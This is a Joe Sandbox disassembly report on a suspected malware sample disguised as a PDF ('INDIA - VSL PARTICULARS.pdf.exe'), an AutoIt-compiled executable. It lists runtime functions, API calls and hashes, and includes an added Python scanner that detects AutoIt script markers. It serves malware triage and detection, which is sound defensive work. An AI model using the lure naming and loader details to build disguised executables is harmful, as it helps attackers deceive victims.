                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe$CMDLINE$CMDLINERAW
                              • API String ID: 3948761352-527741675
                              • Opcode ID: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                              • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                              • Opcode Fuzzy Hash: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                              • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __fread_nolock$_fseek_wcscpy
                              • String ID: D)E$D)E$FILE
                              • API String ID: 3888824918-361185794
                              • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                              • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                              • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                              • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                              Control-flow Graph

                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                              • __wsplitpath.LIBCMT ref: 0040E41C
                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                              • _wcsncat.LIBCMT ref: 0040E433
                              • __wmakepath.LIBCMT ref: 0040E44F
                                • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                              • _wcscpy.LIBCMT ref: 0040E487
                                • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                              • _wcscat.LIBCMT ref: 00427541
                              • _wcslen.LIBCMT ref: 00427551
                              • _wcslen.LIBCMT ref: 00427562
                              • _wcscat.LIBCMT ref: 0042757C
                              • _wcsncpy.LIBCMT ref: 004275BC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                              • String ID: Include$\
                              • API String ID: 3173733714-3429789819
                              • Opcode ID: f7b2e8dd37dad95b873b636539c9fa9ee4ced90e3c163691215c383b9fb11936
                              • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                              • Opcode Fuzzy Hash: f7b2e8dd37dad95b873b636539c9fa9ee4ced90e3c163691215c383b9fb11936
                              • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                              Control-flow Graph

                              APIs
                              • _fseek.LIBCMT ref: 0045292B
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                              • __fread_nolock.LIBCMT ref: 00452961
                              • __fread_nolock.LIBCMT ref: 00452971
                              • __fread_nolock.LIBCMT ref: 0045298A
                              • __fread_nolock.LIBCMT ref: 004529A5
                              • _fseek.LIBCMT ref: 004529BF
                              • _malloc.LIBCMT ref: 004529CA
                              • _malloc.LIBCMT ref: 004529D6
                              • __fread_nolock.LIBCMT ref: 004529E7
                              • _free.LIBCMT ref: 00452A17
                              • _free.LIBCMT ref: 00452A20
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                              • String ID:
                              • API String ID: 1255752989-0
                              • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                              • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                              • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                              • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                              Control-flow Graph

                              APIs
                              • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                              • RegisterClassExW.USER32(00000030), ref: 004104ED
                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                              • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                              • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                              • ImageList_ReplaceIcon.COMCTL32(00AC3130,000000FF,00000000), ref: 00410552
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                              • API String ID: 2914291525-1005189915
                              • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                              • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                              • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                              • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                              Control-flow Graph

                              APIs
                              • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                              • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                              • LoadIconW.USER32(?,00000063), ref: 004103C0
                              • LoadIconW.USER32(?,000000A4), ref: 004103D3
                              • LoadIconW.USER32(?,000000A2), ref: 004103E6
                              • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                              • RegisterClassExW.USER32(?), ref: 0041045D
                                • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00AC3130,000000FF,00000000), ref: 00410552
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                              • String ID: #$0$AutoIt v3
                              • API String ID: 423443420-4155596026
                              • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                              • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                              • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                              • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _malloc
                              • String ID: Default
                              • API String ID: 1579825452-753088835
                              • Opcode ID: 9f85b68769bc30241e5c3250a976f4e3498bb03b948f4ec10db418ad02dabea8
                              • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                              • Opcode Fuzzy Hash: 9f85b68769bc30241e5c3250a976f4e3498bb03b948f4ec10db418ad02dabea8
                              • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

Control-flow Graph (rendered graph not reproduced; entry block 40f5c0, basic blocks 40f5c0-40f6df and 425d05-425d5f, with calls to 422240, 413650, 410e60, 414d04, 4150d1 and 414d30)
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __fread_nolock_fseek_memmove_strcat
                              • String ID: AU3!$EA06
                              • API String ID: 1268643489-2658333250
                              • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                              • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                              • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                              • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
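The two loader functions listed above are stock AutoIt v3 runtime code: the command-line parser that compares (via __wcsicoll, so against wide strings) for /AutoIt3ExecuteLine, /AutoIt3ExecuteScript, /AutoIt3OutputDebug and /ErrorStdOut, and the script reader (_fseek/__fread_nolock/_memmove/_strcat) that checks for the 8-bit tokens AU3! and EA06. Together they tell you the submitted PE is an AutoIt-compiled executable carrying an embedded script, which is the thing to extract next. The scanner below is an added triage example, not part of the Joe Sandbox report and not AutoIt project code: it searches a file for exactly those marker strings, looking for the switches, the "AutoIt v3 GUI" window class and the Software\AutoIt v3\AutoIt registry path as UTF-16LE and for the header tokens as 8-bit text, and returns a heuristic verdict. The adjacency rule (EA06 directly after AU3!), the function names and the embedded sample bytes are this example's own assumptions.

```python
"""Triage helper: locate AutoIt v3 runtime marker strings in a binary.

Added example (not from the Joe Sandbox report or the AutoIt project).
The marker strings come from the function listings; the scanning logic,
the verdict heuristic and the constructed sample are assumptions.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# 8-bit tokens the script loader compares against the embedded script
# container: "AU3!" followed by the format tag "EA06".
NARROW_MARKERS = [b"AU3!", b"EA06"]

# Wide (UTF-16LE) strings used by the runtime's command-line parser, GUI
# setup and include-path lookup (all reached through W-suffixed APIs and
# wcs* CRT calls in the listings).
WIDE_MARKERS = [
    "/AutoIt3ExecuteLine",
    "/AutoIt3ExecuteScript",
    "/AutoIt3OutputDebug",
    "/ErrorStdOut",
    "AutoIt v3 GUI",
    r"Software\AutoIt v3\AutoIt",
]


@dataclass(frozen=True)
class Hit:
    marker: str
    encoding: str  # "ascii" or "utf-16-le"
    offset: int


def scan_bytes(data: bytes) -> List[Hit]:
    """Return every marker occurrence in data, sorted by file offset."""
    hits: List[Hit] = []
    for token in NARROW_MARKERS:
        for m in re.finditer(re.escape(token), data):
            hits.append(Hit(token.decode("ascii"), "ascii", m.start()))
    for text in WIDE_MARKERS:
        for m in re.finditer(re.escape(text.encode("utf-16-le")), data):
            hits.append(Hit(text, "utf-16-le", m.start()))
    return sorted(hits, key=lambda h: (h.offset, h.marker))


def classify(hits: List[Hit]) -> Dict[str, object]:
    """Heuristic verdict (this example's assumption, not a Joe Sandbox rule).

    script_header  : "AU3!" immediately followed by "EA06"
    autoit_runtime : at least one of the wide runtime strings is present
    """
    au3_offsets = {h.offset for h in hits if h.marker == "AU3!"}
    ea06_offsets = {h.offset for h in hits if h.marker == "EA06"}
    script_header = any(o + 4 in ea06_offsets for o in au3_offsets)
    autoit_runtime = any(h.encoding == "utf-16-le" for h in hits)
    if script_header and autoit_runtime:
        verdict = "AutoIt-compiled executable with embedded script"
    elif script_header or autoit_runtime:
        verdict = "partial AutoIt indicators; inspect manually"
    else:
        verdict = "no AutoIt indicators"
    return {"script_header": script_header,
            "autoit_runtime": autoit_runtime,
            "verdict": verdict}


def scan_file(path: str) -> Dict[str, object]:
    """Classify an on-disk file (e.g. the submitted sample)."""
    with open(path, "rb") as fh:
        return classify(scan_bytes(fh.read()))


def build_sample() -> bytes:
    """Constructed stand-in for a compiled AutoIt PE; NOT the analysed sample."""
    blob = bytearray(b"MZ" + b"\x00" * 62)                               # 64-byte fake DOS header
    blob += "/AutoIt3ExecuteScript".encode("utf-16-le") + b"\x00\x00"  # wide switch at offset 64
    blob += b"\x90" * 32                                                 # filler
    blob += b"AU3!EA06" + b"\x00" * 16                                   # "AU3!" at 140, "EA06" at 144
    return bytes(blob)


if __name__ == "__main__":
    sample_hits = scan_bytes(build_sample())
    for h in sample_hits:
        print(f"{h.offset:#08x}  {h.encoding:9}  {h.marker}")
    print(classify(sample_hits)["verdict"])
```

Run scan_file() on the dropped or submitted PE; a plain strings(1) pass misses the switches because they are UTF-16LE, which is why the scanner keeps the two encodings apart and reports which one matched. A positive script_header result means the embedded AU3 script can be carved from the offset of the AU3! hit for further analysis.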

Control-flow Graph (rendered graph not reproduced; entry block 401100, basic blocks 401100-401225 and 42afb4-42b06d; API calls DefWindowProcW, KillTimer, PostQuitMessage, SetTimer, RegisterWindowMessageW and CreatePopupMenu)
                              APIs
                              • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                              • KillTimer.USER32(?,00000001,?), ref: 004011B9
                              • PostQuitMessage.USER32(00000000), ref: 004011CB
                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                              • CreatePopupMenu.USER32 ref: 00401204
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                              • String ID: TaskbarCreated
                              • API String ID: 129472671-2362178303
                              • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                              • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                              • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                              • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                              Control-flow Graph
                              APIs
                              • _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                              • std::exception::exception.LIBCMT ref: 00411626
                              • std::exception::exception.LIBCMT ref: 00411640
                              • __CxxThrowException@8.LIBCMT ref: 00411651
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                              • String ID: ,*H$4*H$@fI
                              • API String ID: 615853336-1459471987
                              • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                              • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                              • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                              • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                              Control-flow Graph
                              APIs
                              • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 03F1DE2D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2191192531.0000000003F1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F1D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_3f1d000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                              • Instruction ID: fb1189dce2f414163c0469ab660500bc9d2b48ad009bd512565c0d8a9dee1e78
                              • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                              • Instruction Fuzzy Hash: 8E51E876A50209FFEF24DFA4DC59FEE7778AF48701F108954F60AEB180DA74A6448B60

                              Control-flow Graph
                              APIs
                              • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                              • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                              • _wcsncpy.LIBCMT ref: 004102ED
                              • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                              • _wcsncpy.LIBCMT ref: 00410340
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                              • String ID: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe
                              • API String ID: 3170942423-2945655381
                              • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                              • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                              • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                              • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4

                              Control-flow Graph
                              APIs
                                • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                              • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                              • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                              • String ID:
                              • API String ID: 3300667738-0
                              • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                              • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                              • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                              • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A

                              Control-flow Graph
                              APIs
                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
